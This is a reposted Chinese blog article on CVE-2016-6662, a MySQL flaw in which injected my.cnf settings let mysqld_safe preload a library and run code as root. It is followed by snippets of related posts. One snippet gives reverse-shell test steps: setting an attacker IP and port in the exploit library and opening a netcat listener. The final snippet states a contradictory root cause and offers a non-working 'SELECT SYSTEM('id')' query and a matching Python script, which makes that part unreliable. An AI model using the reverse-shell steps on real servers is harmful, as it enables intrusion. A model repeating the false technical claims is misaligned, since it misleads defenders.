CVE-2016-6662,研究人员披露 关键MySQL 0day漏洞

最新推荐文章于 2025-08-29 21:42:32 发布
转载 最新推荐文章于 2025-08-29 21:42:32 发布 · 1.7k 阅读 · 0

安全研究员Dawid Golunski发现并公布了影响MySQL数据库管理系统的关键0day漏洞CVE-2016-6662。该漏洞允许远程攻击者注入恶意配置设置,从而完全控制数据库管理系统,执行任意代码。此漏洞影响所有版本的MySQL,并可通过多种方式触发。

安全研究员Dawid Golunski揭露了一个影响流行的数据库管理系统(RDBMS)MySQL的关键性0day。研究人员决定披露关键漏洞,因为甲Oracle在研究人员报告0day漏洞40天后也没有没有发行补丁。


CVE-2016-6662,研究人员披露 关键MySQL 0day漏洞


CVE-2016-6662可以被远程攻击者注入恶意设置为my.cnf配置文件。该漏洞可以被触发并完全向DBMS妥协,通过执行任意拥有root权限的代码,并在服务器上运行的脆弱的MySQL实例。CVE-2016-6662的漏洞公告聚焦于CVEID允许攻击者远程注入恶意设置为MySQL的配置文件(my.cnf),后果很严重。

漏洞影响:

该漏洞影响所有MySQL服务器默认配置的所有版本分支(5.7,5.6,5.5),包括最新的版本,并且本地和远程攻击者都可以利用。无论通过网络连接或网络接口如 phpMyAdmin认证访问,还是SQL注入MySQL数据库,都能被作为开发载体。

MySQL利用的概念证明:如何用root权限触发该漏洞并远程执行代码。

研究人员避免披露某些部分,以免被大范围滥用。

研究人员还透露了一个漏洞, CVE-2016-6663,可能允许低特权攻击者利用零天MySQL的的0day漏洞。

工作原理:

问题在于一个叫mysqld_safe的脚本,作为MySQL默认包的包装来启动MySQL的服务流程。此包装作为root执行,主mysqld过程则降低mysql 用户的特权等级。

如果攻击者设法注入恶意库路径的配置,可以预加载一个任意库以用root权限执行任意代码。前提只需MySQL服务重启,不论通过手动、系统更新、软件更新、系统重启等何种重启方法。

类似的bug在2003年被修补,但Golunski说他它发现的漏洞若回到13年前,可用MySQL的记录功能绕过限制,这是默认可用的。攻击者将能注入恶意配置文件,使用MySQL数据目录创建新的配置文件,或获取通常情况下管理员才有的日志记录功能。


CVE-2016-6662,研究人员披露 关键MySQL 0day漏洞


公开原因:

MySQL的零日漏洞也影响了 PerconaDB MariaDB 数据库,他们的供应商在8月底发行了补丁。PerconaDB MariaDB 开发商发布的补丁在公告资源中可得,构成了潜在威胁。

“我们只能静待Oracle 发布补丁“研究人员还提出了一些暂时的解决方法来减轻威胁:

用户应该确保MySQL用户没有MySQL的配置文件,并创建root-owned的虚拟不可用my.cnf文件“这些都不是完整的解决方案,用户应尽快申请官方供应商的补丁。

完整漏洞报告:http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html


来源:漏洞银行
链接:http://www.bugbank.cn/news/detail/57d7abae4307ee922332ad85.html
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
SAKAISON
关注
【渗透测试】-vulnhub源码框架漏洞-Os-hackNos-1
weixin_65311462的博客
09-18 1775
源码框架是指在软件开发过程中,为了提高开发效率、简化开发流程、提高代码质量和可靠性的基础架构和模板。若该框架中存在漏洞,hacker便可以此漏洞,迅速发起所谓的“1day攻击”-针对那些尚未应用相应安全补丁的、使用了该漏洞框架的网站或应用进行广泛而有效的渗透,严重威胁到用户数据的安全性和服务的稳定性。
技战法-监测挖掘抵御0day漏洞
2301_77391997的博客
07-29 755
是指尚未被相关软硬件厂商或开发者或的安全漏洞。此类漏洞常被攻击者利用实施,且(如态势感知系统、防火墙等均无法全面产生有效告警和拦截)。在中,0day漏洞已成为红队人员攻破蓝队防御体系的重要。通常针对以及。一旦某系统0day漏洞被公开,将导致等面临安全风险。因此,在现有基础上,应重点关注,并与及建立,共同应对0day漏洞带来的安全挑战。
最新MySQL数据库漏洞情况通报
12-15
近日,互联网上披露了关于MySQL数据库存在代码执行漏洞( CNNVD-201609-183 )的情况。由于MySQL数据库默认配置存在一定缺陷,导致攻击者可利用该漏洞对数据库配置文件进行篡改,进而以管理员权限执行任意代码,远程控制受影响服务器。目前,Oracle官方网站发布声明将于10月发布关键补丁更新信息。 一、漏洞简介 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。 MySQL数据库中的配置文件(my.cnf)存在远程代码执行漏洞漏洞编号:CNNVD-201609-183,CVE-2016-6662),以下版本受到该漏洞影响:MySQL 5.7
CVE-2016-6662 mysql RCE测试
weixin_30472035的博客
09-14 275
参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法 1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口: #define ATTACKERS_IP "xx.x.x.x" #define SHELL_PORT 81 在攻击者机器上做好端口监听,等待反弹: nc -lvv -p 81 ...
MySQL远程代码执行(CVE-2016-6662)漏洞预警
煜铭2011
09-13 6760
一、漏洞基本信息 CVE编号:CVE-2016-6662 漏洞名称:MySQL远程代码执行 漏洞发布日期:2016.09.12 受影响的软件及系统:MySQL 漏洞概述:这个漏洞影响(5.7, 5.6, 和 5.5版本)的所有Mysql默认配置,包括最新的版本,攻击者可以远程和本地利用该漏洞。该漏洞需要认证访问MYSQL数据库(通过网络连接或者像phpMyAdmin的web接口),以及
谷歌报告显示:2023 年 50% 的0day漏洞利用背后都是间谍软件供应商
double222222的博客
07-11 1590
2023 年,有 8 个针对 Chrome 的野外0day漏洞,11 个针对 Safari 的野外0day漏洞。虽然被跟踪的 Safari 0day漏洞被用于针对 iPhone 的链中,但除了其中一个 Chrome 0day漏洞外,所有其他漏洞都被用于针对 Android 设备的攻击链中。商业监控软件供应商(CSV)是浏览器和移动设备利用背后的罪魁祸首,2023 年,谷歌将 75% 的已知0day漏洞利用针对 Google 产品以及 Android 生态系统设备(17 个漏洞中的 13 个)。
攻防演练:如何防护0day漏洞
最新发布
seoppg的博客
08-29 1343
0day防护需持续演进,攻防演练是检验防护能力的试金石。企业应重视演练后的整改与投入,构建多层次防御体系。
25年HVV关于0day的面试题
liguangyao213的博客
02-21 712
采用随机化指纹生成技术(如每6小时自动修改HTTP Server头字段),将Linux伪装成Windows Server、IIS、Apache混合版本,避免静态特征被识别。开放非业务端口(如2222、8443)并部署伪造服务(模仿Redis、MySQL),返回虚假数据干扰攻击者扫描。部署DNS流量清洗设备,阻断非常用域名解析(如.onion、.xyz),并对长域名、高频请求实施速率限制。对敏感操作(如sudo提权)实施二次认证(手机令牌+生物特征),阻断凭证窃取后的滥用。5000篇网安资料库。
mysql cve_CVE-2016-6662 mysql RCE测试
weixin_34409895的博客
01-30 435
参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:#define ATTACKERS_IP "xx.x.x.x"#define SHELL_PORT 81在攻击者机器上做好端口监听,等待反弹:nc -lvv -p 812.编译库gcc -Wall -fPI...
CVE-2016-6662 利用条件
weixin_30379973的博客
09-18 357
首先执行SET GLOBAL 需要超级用户权限,所以利用条件要么用户本身是超级用户要么用户有trigger权限,通过创建trigger,由超级用户触发SET GLOBAL。 然而MYsql有个通过file权限提权的漏洞一直没修,可通过写TRG文件创建Trigger方法,参考https://www.exploit-db.com/exploits/23077/,http://www.cnblogs....
mysql malloc lib_CVE-2016-6662-MySQL ‘malloc_lib’变量重写命令执行分析 | CN-SEC 中文网...
weixin_39760967的博客
01-19 294
摘要今天有个关于MySQL漏洞披露出来,编号CVE-2016-6662。该漏洞主要涉及到 mysqld_safe 脚本中在加速/处理内存时会采用 “malloc_lib”变量作为辨别标记选择性加载(preload方式)比如tcmalloc之类的malloc库。不幸的的是这个变量可以被my.cnf所控制,导致my.cnf一旦被攻击者在mysql客户端篡改的话可以直接导致mysqld_safe所调...
mysql my malloc_【技术分享】CVE-2016-6662-MySQL ‘malloc_lib’变量重写命令执行分析
weixin_36185435的博客
01-19 369
引用【漏洞预警】Mysql代码执行漏洞,可本地提权(含exp,9/13 01点更新)【技术分享】CVE-2016-6662Mysql远程代码执行/权限提升技术分析正式版(9/13 10:47更新)前言今天有个关于MySQL漏洞披露出来,编号CVE-2016-6662。该漏洞主要涉及到 mysqld_safe 脚本中在加速/处理内存时会采用 “malloc_lib”变量作为辨别标记选择性加载(...
漏洞分析】UDF提权漏洞——CVE-2016-6662-MySQL ‘malloc_lib’变量重写命令执行
2401_88326437的博客
01-06 912
从2003开始,默认通过SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf'是不能覆写文件的,但是我们可以利用mysql logging(MySQL )功能绕过outfile/dumpfile重写文件的保护,攻击者需要 SELECT/FILE 权限。于是在提权成功后,花了一天时间特意搜了一下整个UDF提权的漏洞原理和利用,加深理解。可以看到mysqld_safe的wrapper(封装)脚本是root权限执行的,而主要的mysqld进程确实mysql用户权限执行的。
Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662
9ian1i
10-17 5171
0x00 漏洞影响mysql 5.5、5.6、5.7 在10月份更新前的所有版本,包括分支版本MariaDB和PerconaDB 。0x01 利用途径通过远程数据库连接,web接口如phpMyAdmin,以及sql注入都可以完成。0x02 漏洞原理一些默认的mysql安装方式并且mysqld_safe脚本作为包装器以root权限启动mysql服务进程,比如像:service mysql start
mysql cve 2016 3521,CVE-2016-6662CVE-2016-6663 MySQL代码执行0-day漏洞 可本地提权
weixin_32531655的博客
03-17 824
漏洞简介: CVE-2016-6662漏洞可令来自远程或本地的攻击者,往MySQL设置文件(my.cnf)中注入自定义的数据库设置。该问题仅影响到默认设置下的MySQL服务器,从漏洞利用步骤来看,在数据库重启后即可触发。通常在系统更新、包更新等操作期间,数据库服务器都会重启。认证访问MySQL数据库(通过网络连接或者如phpMyAdmin一类web界面),以及SQL注入都可作为漏洞利用方式——尤...
MySQL提权/条件竞争漏洞分析和利用(37)
yyj1781572的博客
04-30 1999
通过本实验,能够掌握MySQL提权/条件竞争漏洞的原理,并能够复现该漏洞,以及掌握该漏洞的修复方法。
网络安全之MySql攻击
一位专注网络安全以及渗透的资深工程师
01-09 1891
如果在 Windows 系统下的话应该就是最高权限了,执行一些 net user 增加用户的命令应该都是可以成功的现在文章思路慢慢变成了 MySQL 可操控文件怎么将这个危害扩大影响的问题了。可以往管理员桌面上写一个伪造的 CS 木马,如果对方 Office 有漏洞的话可以写入一个带后门的 word 文件,也可以篡改用户常执行的文件等 这样发散开来就变的很广了,国光这里不再一一叙述了,总之实际场景实际分析,大家在渗透的时候也可以多多思考更多的可能性,万一就成功了呢。
Oracle MySQL 远程代码执行漏洞/提权漏洞(CVE-2016-6662)漏洞攻击
06-19
### Oracle MySQL CVE-2016-6662 漏洞攻击方式与防护措施 #### 1. 漏洞概述 CVE-2016-6662 是一个存在于 Oracle MySQL 数据库中的远程代码执行漏洞,允许攻击者通过特定条件获取数据库的 Root 权限。此漏洞源于 MySQL 的权限管理机制存在缺陷[^1]。 #### 2. 攻击方式 攻击者可以通过以下方式利用该漏洞- **权限提升**:攻击者可以利用 MySQL 的 `super_priv` 权限,在未验证身份的情况下,通过构造恶意 SQL 查询来执行系统命令或更改数据库配置[^1]。 ```sql -- 构造恶意 SQL 查询以执行系统命令 SELECT SYSTEM('id'); -- 示例命令执行查询 ``` - **远程代码执行**:通过结合其他漏洞(如文件写入或动态库加载),攻击者可以在目标系统上执行任意代码[^1]。 #### 3. 防护措施 为了防止 CVE-2016-6662 被利用,可以采取以下措施: - **更新补丁**:及时安装官方发布的最新安全更新,确保修复已知漏洞[^1]。 - **最小化权限**:避免授予用户不必要的高权限,尤其是 `SUPER` 权限。仅在必要时为可信用户分配最低权限[^1]。 - **强化配置**:修改 MySQL 配置文件(如 `my.cnf`),禁用不必要的功能和服务,并限制外部访问。 ```ini # 修改 MySQL 配置文件以增强安全性 [mysqld] bind-address = 127.0.0.1 skip-networking ``` - **监控日志**:启用并定期检查 MySQL 日志文件,以便及时发现和响应可疑活动。 - **入侵检测系统 (IDS)**:部署 IDS 工具以监控网络流量,识别和阻止潜在的攻击行为[^1]。 #### 4. 技术细节 此漏洞的根本原因在于 MySQL 的权限验证逻辑存在缺陷,使得攻击者能够绕过正常的权限检查机制。例如,当攻击者发送特制的 SQL 查询时,MySQL 可能未能正确验证其权限,从而导致未经授权的操作被成功执行[^1]。 ```python # 示例 Python 脚本模拟攻击场景 import mysql.connector # 连接至目标 MySQL 数据库 db = mysql.connector.connect( host="localhost", user="attacker", password="password" ) cursor = db.cursor() # 执行恶意 SQL 查询 cursor.execute("SELECT SYSTEM('id');") # 尝试执行系统命令 ``` --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值